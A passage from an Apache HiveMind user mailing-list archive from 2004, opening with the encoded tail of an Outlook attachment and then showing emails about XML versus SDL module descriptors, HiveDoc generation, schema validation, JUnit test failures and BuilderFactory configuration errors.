wpNhjfCY0bs/MIWAcyvoNS9UXy0u4P5sP/AuLy8/ME8xXzJvM3//Pp88rz2/Ps8/30PvQf9DD/9G r0e/SM9J30rvS/8j/03/b4QvftATEY1ALjg/dQNM1mV+4PrAU/1wcFAvUT9lTCxJhYBlcJDA5wBu gYbASjJFRSAvjRDpWPEtU4bgcoHwjcDngX/88StBj4FZQFW/Vs9MLEP/rlCAMDTwjYBaoDrjU791 A+5UO0ClAKZQeVufXK9dv/9ezIUmYX9ij0wv41/kaGdw/HRw5rDnsFMzflBVMYWwXwdQmMLlDH4w OoBkX8JmA4XwBoF0e0hZUEVkUkzo8Esgat9r6X0efXvhhfCukI+AXGNm/DFcjeFoaG8va/frL3f6 /+u/0l9mL2c/aE94b3l/T3n/fi9/P4BPIx97L3w/ekspv/8qzyvfLO8t/zuvgz+ETzTf/zXvNv84 DzkfOi+KT4tfjG9fep+Vj5afl6+YsDWY4S/wRk9OVJk5dN9GIB9iX3YYmjgfU5o/HsY3d6JQhXf+ MOQBL0RJVpxvPaCPZ3VhH3Ok76X/NTjhd7FCT0RZd/13oKcvhamxN3exSFRNTJkwAn2r4AAAHgA1 EAEAAABNAAAAPDBCRUIzMjdGOEVFOEM2NENCOTI2MEQ2REE0MTMzRjE1MDFFNDExRjlAZWhvc3Qw MTAtMy5leGNoMDEwLmludGVybWVkaWEubmV0PgAAAAAeAEcQAQAAAA8AAABtZXNzYWdlL3JmYzgy MgAACwDyEAEAAAAfAPMQAQAAADwAAABBAFcAJQAzAEEAIABGAHUAbgBuAHkAIABlAHIAcgBvAHIA IABtAGUAcwBzAGEAZwBlAC4ARQBNAEwAAAALAPYQAAAAAEAABzByCYZzFm7EAUAACDC7y5v+Fm7E AQMA3j+vbwAAAwDxPwcEAAAeAPg/AQAAAA4AAABTdGVmYW4gTGllYmlnAAAAAgH5PwEAAABlAAAA AAAAANynQMjAQhAatLkIACsv4YIBAAAAAAAAAC9PPU9FWENIMDEwL09VPUZJUlNUIEFETUlOSVNU UkFUSVZFIEdST1VQL0NOPVJFQ0lQSUVOVFMvQ049U1RFRkFOLkxJRUJJRwAAAAAeAPo/AQAAABUA AABTeXN0ZW0gQWRtaW5pc3RyYXRvcgAAAAACAfs/AQAAAB4AAAAAAAAA3KdAyMBCEBq0uQgAKy/h ggEAAAAAAAAALgAAAAMA/T/kBAAAAwAZQAAAAAADABpAAAAAAAMAHUAAAAAAAwAeQAAAAAAeADBA AQAAAA4AAABTVEVGQU4uTElFQklHAAAAHgAxQAEAAAAOAAAAU1RFRkFOLkxJRUJJRwAAAB4AMkAB AAAAEQAAAGhsc2hpcEBnbWFpbC5jb20AAAAAHgAzQAEAAAARAAAAaGxzaGlwQGdtYWlsLmNvbQAA AAAeADhAAQAAAA4AAABTVEVGQU4uTElFQklHAAAAHgA5QAEAAAACAAAALgAAAAMAdkD/////CwAp AAAAAAALACMAAAAAAAMABhBXhyTIAwAHELYFAAADABAQAAAAAAMAERAAAAAAHgAIEAEAAABlAAAA SUhBRFRIRVNBTUVFRkZFQ1RUV09BTE1PU1RJREVOVElDQUxISVZFTU9EVUxFRklMRVBBVEhTRVhD RVBUVEhBVE9ORURSSVZFTEVUVEVSV0FTSU5VUFBFUkNBU0VBTkRUSEVPVAAAAAACAX8AAQAAAE0A AAA8MEJFQjMyN0Y4RUU4QzY0Q0I5MjYwRDZEQTQxMzNGMTUwMUU0MTFGOUBlaG9zdDAxMC0zLmV4 Y2gwMTAuaW50ZXJtZWRpYS5uZXQ+AAAAAPx5 ------_=_NextPart_001_01C46E16.FE8B1BFB Content-Type: text/plain; charset=us-ascii --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] ------_=_NextPart_001_01C46E16.FE8B1BFB-- From [email protected] Tue Jul 20 08:26:39 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34630 invoked from network); 20 Jul 2004 08:26:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 08:26:39 -0000 Received: (qmail 13410 invoked by uid 500); 20 Jul 2004 08:26:39 -0000 Delivered-To: [email protected] Received: (qmail 13391 invoked by uid 500); 20 Jul 2004 08:26:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13378 invoked by uid 99); 20 Jul 2004 08:26:38 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mail1.tui.de) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 20 Jul 2004 01:26:35 -0700 Received: from tuiger6.tui.de (sun41.tui.de [161.129.204.104]) by mail1.tui.de (8.12.11/8.12.10) with ESMTP id i6K8QSaK014827 for <[email protected]>; Tue, 20 Jul 2004 10:26:32 +0200 (MEST) Received: by tuiger6.tui.de with Internet Mail Service (5.5.2655.55) id <PHZM79V7>; Tue, 20 Jul 2004 10:26:28 +0200 Message-ID: <[email protected]> From: "Wunderlich, Lars" <[email protected]> To: "'[email protected]'" <[email protected]> Subject: XML/SDL compatibility, Hivedoc, Validation Date: Tue, 20 Jul 2004 10:26:27 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain X-Scanned-By: MIMEDefang 2.35 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N The documentation on the website says: "XML will continue to be supported as a first class citizen, but in HiveMind, there is not such a compelling reason to use it!" Conclusion: XML and SDL should be compatible!? We try to decide between SDL and XML in our project at the moment. In comparison to XML adequate tools for SDL creation seem to be missing, therefore XML might be our preferred candidate as configuration format. But there are three questions: 1.) How can Hivedoc documentation be integrated inside the XML format? Are there any detailled examples available? 2.) How can we create hivedoc documentation from configuration files? There are Ant XML targets inside the distributes build.xml file but an extraction of the main hivedoc target seems to be complex, isn't it!? 3.) Is there any XML Schema available to validate XML structure against? SDL has no validation at all, the complete validation seems to be processed inside the org.apache.hivemind.parse.DescriptorParser. I think it could be build up by creating an XML Schema by hand referring to the complete documentation. Is that right? Best regards Lars Wunderlich --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 09:38:40 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76230 invoked from network); 20 Jul 2004 09:38:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 09:38:40 -0000 Received: (qmail 37773 invoked by uid 500); 20 Jul 2004 09:38:39 -0000 Delivered-To: [email protected] Received: (qmail 37708 invoked by uid 500); 20 Jul 2004 09:38:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37691 invoked by uid 99); 20 Jul 2004 09:38:38 -0000 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO rwcrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 20 Jul 2004 02:38:36 -0700 Received: from almightybeast (h0010b50ed00a.ne.client2.attbi.com[161.129.204.104]) by comcast.net (rwcrmhc11) with SMTP id <20040720093834013003ffgge>; Tue, 20 Jul 2004 09:38:34 +0000 From: "Howard M. Lewis Ship" <[email protected]> To: "'Lars Wunderlich'" <[email protected]>, <[email protected]> Subject: RE: Question concerning XML and SDL compatibility in Hivemind Date: Tue, 20 Jul 2004 05:38:21 -0400 Message-ID: <018a01c46e3d$4db3dcb0$6501a8c0@ALMIGHTYBEAST> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N XML and SDL are fully equivalent. If you name your descriptor hivemodule.xml then it should be in XML format. For XML documents, HiveMind uses JAXP to locate a SAX parser. For SDL, it uses its own internal parser. Both generate the same SAX parse events, and the rest of the code inside the DescritptorParser class doesn't know or care which format its reading ... it sees elements and attributes and character data and turns that into module descriptor objects. -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com > -----Original Message----- > From: Lars Wunderlich [mailto:[email protected]] > Sent: Tuesday, July 20, 2004 2:34 AM > To: [email protected] > Subject: Question concerning XML and SDL compatibility in Hivemind > > > Dear Mr Ship, > > I'm planning to use your hivemind framework inside my > project. I'm a little > bit confused about the proprietary SDL format. Your > documentation says that > one can either the SDL or the XML format for configuration purposes. > What about hivedoc documentation inside XML? Is the usage absolutely > equivalent to the SDL format? Can I generate Hivedoc from > XML? Which XML > elements/attributes do I have to use? > > Best regards > > Lars Wunderlich. > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 09:44:29 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78713 invoked from network); 20 Jul 2004 09:44:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 09:44:28 -0000 Received: (qmail 47061 invoked by uid 500); 20 Jul 2004 09:44:27 -0000 Delivered-To: [email protected] Received: (qmail 46999 invoked by uid 500); 20 Jul 2004 09:44:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46970 invoked by uid 99); 20 Jul 2004 09:44:27 -0000 X-ASF-Spam-Status: No, hits=1.6 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS,MAILTO_TO_SPAM_ADDR X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 20 Jul 2004 02:44:24 -0700 Received: from almightybeast (h0010b50ed00a.ne.client2.attbi.com[161.129.204.104]) by comcast.net (rwcrmhc13) with SMTP id <20040720094423015003fd55e>; Tue, 20 Jul 2004 09:44:23 +0000 From: "Howard M. Lewis Ship" <[email protected]> To: <[email protected]>, <[email protected]> Subject: RE: Stuck w/hivemind, please help :-) Date: Tue, 20 Jul 2004 05:44:13 -0400 Message-ID: <018b01c46e3e$1db1b630$6501a8c0@ALMIGHTYBEAST> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal In-Reply-To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I think the failures are caused by slight differences in the version of junit used. Do you know which version of junit you installed? -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com > -----Original Message----- > From: [email protected] [mailto:[email protected]] > Sent: Tuesday, July 20, 2004 4:23 AM > To: Howard M. Lewis Ship > Subject: Re: Stuck w/hivemind, please help :-) > > > Thanks for the quick reply, this really helped! > > This is, what I did to compile hivemind-cvs: > > Eclipse 3.0, Java 1.4.2, MacOSX 10.3.4, Ant 1.6.2 (everything > current > release) > Grabbed hivemind via eclipse > had to install junit and antgrab into ant-lib > run ant, afterwards eclipse was still complaining about missing libs > (e.g. geronimo) > copied those manually, eclipse now likes the project (except > for a ton > of warnings) > run ant: > > [junit] Test hivemind.test.ant.TestConstructRegistry FAILED > [junit] Test hivemind.test.rules.TestNumericTranslators FAILED > [junit] Test hivemind.test.sdl.TestSDLResourceParser FAILED > [junit] Test hivemind.test.services.TestMethodSignature FAILED > > attached is the full log of the ant run. > > So, I am still running on beta-1, your hint is working very nicely, > *but*: > > implementation (service-id=Repository) { > invoke-factory (service-id=com.plaengine.MockFactory) > interceptor (service-id=hivemind.LoggingInterceptor) > } > > will produce: > > DEBUG (main) foo.Repository - Applying interceptor factory > hivemind.LoggingInterceptor > Exception in thread "main" > org.apache.hivemind.ApplicationRuntimeException: Unable to construct > service foo.Repository: Unable to lookup $Proxy0: $Proxy0 > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl > .construct > NewServiceImplementation(AbstractServiceModelImpl.java:156) > at > org.apache.hivemind.impl.servicemodel.AbstractServiceModelImpl > .construct > ServiceImplementation(AbstractServiceModelImpl.java:130) > at > org.apache.hivemind.impl.servicemodel.SingletonServiceModel.ge > tActualSer > viceImplementation(SingletonServiceModel.java:69) > at > $InnerProxy_fddb99d2b5_3._service($InnerProxy_fddb99d2b5_3.java) > at > $InnerProxy_fddb99d2b5_3.deleteAllCached($InnerProxy_fddb99d2b > 5_3.java) > at > $SingletonProxy_fddb99d27b_2.deleteAllCached($SingletonProxy_f > ddb99d27b_ > 2.java) > at testing.HiveTest.main(HiveTest.java:45) > > without the interceptor, everything is fine. I file that as a bug, > right? > > > Many thanks for all your help and such a nice tool! > > )-(agen > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 09:49:32 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81680 invoked from network); 20 Jul 2004 09:49:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 09:49:32 -0000 Received: (qmail 53082 invoked by uid 500); 20 Jul 2004 09:49:31 -0000 Delivered-To: [email protected] Received: (qmail 53024 invoked by uid 500); 20 Jul 2004 09:49:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53009 invoked by uid 99); 20 Jul 2004 09:49:31 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Tue, 20 Jul 2004 02:49:26 -0700 Received: by mproxy.gmail.com with SMTP id x43so471423cwb for <[email protected]>; Tue, 20 Jul 2004 02:49:26 -0700 (PDT) Received: by 161.129.204.104 with SMTP id u42mr303523cwc; Tue, 20 Jul 2004 02:49:26 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 20 Jul 2004 05:49:26 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: XML/SDL compatibility, Hivedoc, Validation In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N HiveDoc from XML is exactly the same as HiveDoc from SDL, i.e.: <module id="foo.bar.Baz" version="1.0.0"> Documentation for this module, etc., etc. <configuration-point id="MyConfig"> Documentation for this config, etc. </configuration-point> </module> As with Ant build files, you can't generate a schema for HiveMind descriptor files because they are self-defining and inter-dependent (module A may define a schema that determines the valid format for portions of module B, for example). Generating HiveDoc: the easy part is reading all the available descriptors to form the master registry.xml ... there's an Ant task to do that. The tricky part is combinding that with the hivedoc XSL files (but even that's not too hard). On Tue, 20 Jul 2004 10:26:27 +0200, Wunderlich, Lars <[email protected]> wrote: > The documentation on the website says: "XML will continue to be supported as > a first class citizen, but in HiveMind, there is not such a compelling > reason to use it!" Conclusion: XML and SDL should be compatible!? > > We try to decide between SDL and XML in our project at the moment. In > comparison to XML adequate tools for SDL creation seem to be missing, > therefore XML might be our preferred candidate as configuration format. > > But there are three questions: > > 1.) How can Hivedoc documentation be integrated inside the XML format? Are > there any detailled examples available? > 2.) How can we create hivedoc documentation from configuration files? There > are Ant XML targets inside the distributes build.xml file but an extraction > of the main hivedoc target seems to be complex, isn't it!? > 3.) Is there any XML Schema available to validate XML structure against? SDL > has no validation at all, the complete validation seems to be processed > inside the org.apache.hivemind.parse.DescriptorParser. I think it could be > build up by creating an XML Schema by hand referring to the complete > documentation. Is that right? > > Best regards > > Lars Wunderlich > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 20 12:10:29 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46716 invoked from network); 20 Jul 2004 12:10:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jul 2004 12:10:29 -0000 Received: (qmail 45181 invoked by uid 500); 20 Jul 2004 12:10:29 -0000 Delivered-To: [email protected] Received: (qmail 45134 invoked by uid 500); 20 Jul 2004 12:10:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45120 invoked by uid 99); 20 Jul 2004 12:10:28 -0000 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ns2.post.ch) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Tue, 20 Jul 2004 05:10:25 -0700 Received: from hpie0c.post.ch (hpie0c.post.ch [161.129.204.104]) by ns2.post.ch (8.13.0/8.13.0) with SMTP id i6KCAJQ4027458 for <[email protected]>; Tue, 20 Jul 2004 14:10:19 +0200 Received: from nodnsquery(161.129.204.104) by hpie0c.post.ch via csmap id c46e9b00_da45_11d8_969a_00304811b3c7_2484; Tue, 20 Jul 2004 14:10:19 +0200 (CEST) Received: from hmsx09.pnet.ch (hmsx09.pnet.ch [161.129.204.104]) by hcehan.post.ch (8.13.0/8.13.0) with ESMTP id i6KCAGev440178 for <[email protected]>; Tue, 20 Jul 2004 14:10:18 +0200 (CEST) Received: from hmsx01.pnet.ch ([161.129.204.104]) by hmsx09.pnet.ch with Microsoft SMTPSVC(5.0.2195.6713); Tue, 20 Jul 2004 14:10:17 +0200 X-MimeOLE: Produced By Microsoft Exchange V6.0.6556.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: XML/SDL compatibility, Hivedoc, Validation Date: Tue, 20 Jul 2004 14:10:17 +0200 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: XML/SDL compatibility, Hivedoc, Validation Thread-Index: AcRuPt5NA4u/7JXJRZiyPeuUYbUIrQAErHhg From: <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 20 Jul 2004 12:10:17.0808 (UTC) FILETIME=[856CA500:01C46E52] X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N >=20 > As with Ant build files, you can't generate a schema for HiveMind > descriptor files because they are self-defining and inter-dependent > (module A may define a schema that determines the valid format for > portions of module B, for example). >=20 As Howard says we can't define a DTD which defining the structure of HiveMind module descriptors, but we could write a XML Schema. The XML Schema can only define the general structure of a module descriptor (e.g. the root and top-level elements) and could thus be used to *partially* validate a descriptor. Would this be useful to anybody ? --knut --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 21 17:53:54 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53329 invoked from network); 21 Jul 2004 17:53:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Jul 2004 17:53:54 -0000 Received: (qmail 31933 invoked by uid 500); 21 Jul 2004 17:53:54 -0000 Delivered-To: [email protected] Received: (qmail 31919 invoked by uid 500); 21 Jul 2004 17:53:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31898 invoked by uid 99); 21 Jul 2004 17:53:53 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_80_90,HTML_MESSAGE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO trnsmail01.jax.etranscor.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 21 Jul 2004 10:53:50 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C46F49.6356D188" Subject: invoke-factory question content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 Date: Wed, 21 Jul 2004 13:37:26 -0400 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: invoke-factory question Thread-Index: AcRvSWLXt6lLFqHiRj6FCU4614Csbw== From: "Kurt R. Hoehn" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C46F49.6356D188 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello, =20 I'm trying to do the following, =20 service-point( id=3DAddressBuilder interface=3Dcom.etranscor.bean.address.Address ) { invoke-factory( service-id=3Dhivemind.BuilderFactory ) { construct( class=3Dcom.etranscor.bean.address.AddressImpl ) { set-object( property=3Dsomeobject value=3D"instance:com.etranscor.some.ParameterLessConstructor" ) // set-object( property=3Dsomeobject value=3Dcom.etranscor.some.ParameterLessConstructor ) also did not work } } } =20 I keep getting the following error =20 org.apache.hivemind.impl.DefaultErrorHandler.error(DefaultErrorHandler.j ava:37) SchemaProcessorImpl [ERROR] Error at jar:file:/C:/Development/workspace/etranscor/dist/etranscor-1.0.jar!/MET A-INF/hivemodule.sdl, line 9, column 29: Element construct/set-object is not allowed here. =20 I can't find anywhere in the documentation that says I can't do that, so what am I doing wrong. =20 TIA, -kurt h =20 ------_=_NextPart_001_01C46F49.6356D188 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Hello,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I&#8217;m trying to do the = following,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>service-point( id=3DAddressBuilder interface=3Dcom.etranscor.bean.address.Address = )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>{</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp; invoke-factory( service-id=3Dhivemind.BuilderFactory = )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp; {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;construct( = class=3Dcom.etranscor.bean.address.AddressImpl )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;set-object( property=3Dsomeobject = value=3D&quot;instance:com.etranscor.some.ParameterLessConstructor&quot; )</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //<span style=3D'background:white'> set-object( property=3Dsomeobject = value=3Dcom.etranscor.some.ParameterLessConstructor )</span> also did not work<o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>&nbsp;&nbsp;&nbsp; }</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt; font-family:"Courier New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 = face=3D"Courier New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";background:white'>}</span></font><font size=3D2 face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family:"Courier = New"'><o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I keep getting the following = error<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3D"Courier = New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";color:blue;background:white'>org.apache.hivemind.impl.DefaultErrorHa= ndler.error(DefaultErrorHandler.java:37) SchemaProcessorImpl [ERROR] Error at jar:file:/C:/Development/workspace/etranscor/dist/etranscor-1.0.jar!/META= 